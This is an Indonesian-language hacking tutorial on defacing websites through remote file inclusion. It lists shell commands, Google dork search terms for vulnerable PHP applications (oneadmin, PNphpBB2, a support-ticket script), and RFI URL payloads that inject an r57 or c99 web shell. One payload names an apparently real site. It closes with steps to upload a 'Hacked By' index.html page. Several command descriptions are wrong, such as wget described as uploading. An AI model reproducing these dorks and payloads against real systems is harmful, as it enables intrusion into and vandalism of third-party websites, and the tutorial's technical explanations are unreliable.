+++CARA MUDAH DEFACE WEB VIA RFI+++

CARA MUDAH DEFACE WEB VIA RFI

Sebelum kita membahas cara mendeface web via RFI, kita harus mengetahui beberapa perintah yang digunakan untuk melakukan deface

cd Nama directory : Melihat suatu directory yang kita pilih

ls –al : Untuk melihat suatu directory tertentu lebih rinci lagi

cat : membaca suatu file atau berkas lainnya

w : agar mengetahui siapa sajakah yang telah menggunakan shell

pwd : mengetahui di suatu directory manakah kita berada

tar –zxvf : Mengextract sutau files yang berbentuk atau berektensi tgz

find : untuk memantau suatu direktori-direktori tertentu

uname –a : untuk mengetahui path berada

curl : untuk mendownload URL tertentu

wget : untuk mengupload suatu file yang kita tentukan

[EvilShellInject] : inject rshell / c99 kamu

KITA MULAI !!

Kita akan memulai dengan PHP, karena PHP banyak sekali BUG nya

Sebelumnya kita cari dulu RFI nya dulu di http://www.milw0rm.com

-          Site Oneadmin RFI

Sekarang tugas kamu adalah googling di paman google degan kata kunci oneadmin site:.com

Lalu saya kasih dech contoh path nya http://target.com/oneadmin/config.php?path[docroot]=

Contohnya :

http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]

-          PnPhpBB2

Lalu kamu googling lagi dengan kata kunci modules.php powered by pnphpbb2 site:.com atau apa saja dech yang kalian kehendaki

Sekarang saya kasih contoh path nya http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]

Contohnya :

http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]

-          Support ticket

Kita googling lagi pake paman google,, ( cape juga yach googling terus...hehe ) dengan kata kunci include/main.php site:.com atau yang kalian inginkan

Sekarang saya kasih contoh path nya http://target.com/include/main.php?config[search_disp]=true&include_dir=

Contohnya :

http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]

SELESAI....

Setelah itu buatlah sebuah file index.html

Isi dengan Hacked By Nama kamu, nama hewan peliharaan mu, nama ibu mu, nama ayah mu, nama tetangga mu, TERSERAH....

Tau ga cara nya membuat file index.html ?

Cara ini untuk kalian yang belum paham...maaf yang sudah paham, bukan bermaksud untuk menggurui kalian..

Cara nya kamu buka notepad ( atau notepad++ yang lebih komplit bisa juga pake software html editor lainnya )

Tulislah :

HACKED BY NAMA KAMU, atau yang lainnya

(atau bisa pakai kode html lainnya yang telah kalian ketahui)

Lalu kalian upload file index.html kamu ke direktorinya

Lalu kalian buka dech website yang telah kalian Deface

Contoh : http://target.com/lokasipathnya/index.html

SUKSES !!